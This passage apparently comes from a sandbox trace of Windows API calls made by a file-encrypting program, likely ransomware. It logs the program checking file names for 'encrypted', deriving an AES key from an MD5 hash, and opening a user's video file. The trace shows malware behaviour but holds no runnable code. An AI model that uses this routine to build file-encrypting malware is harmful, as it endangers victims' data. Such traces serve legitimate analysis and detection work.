HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ejDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jDsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DsspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sspxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="spxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pxAB.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.944] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.944] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.944] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.944] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.944] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.944] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.944] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.945] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.945] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1c70ab0, ftCreationTime.dwHighDateTime=0x1d5c0af, ftLastAccessTime.dwLowDateTime=0x72ef5940, ftLastAccessTime.dwHighDateTime=0x1d5c503, ftLastWriteTime.dwLowDateTime=0x72ef5940, ftLastWriteTime.dwHighDateTime=0x1d5c503, nFileSizeHigh=0x0, nFileSizeLow=0x182dc, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="ejDsspxAB.mkv", cAlternateFileName="EJDSSP~1.MKV")) returned 0x7c2100 [0042.945] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.945] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.945] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.945] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.945] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.945] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.945] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.945] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.945] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.945] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.945] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.946] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.946] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.946] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.946] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0042.946] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.946] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.947] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.947] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.947] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.947] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.947] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.947] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.947] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.948] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.948] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.948] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.948] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.948] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.948] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.948] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.948] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.948] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.948] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.948] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.948] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.948] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.948] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.948] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.949] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.949] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.949] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.949] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.949] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.949] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.949] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.949] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.950] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0042.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.950] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.950] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0042.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.950] CryptDestroyHash (hHash=0x7c2240) returned 1 [0042.950] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.950] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.950] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.951] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.951] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.951] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ejdsspxab.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.951] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.951] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0042.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0042.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.951] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.951] HeapFree (in: hHeap=0x770000, 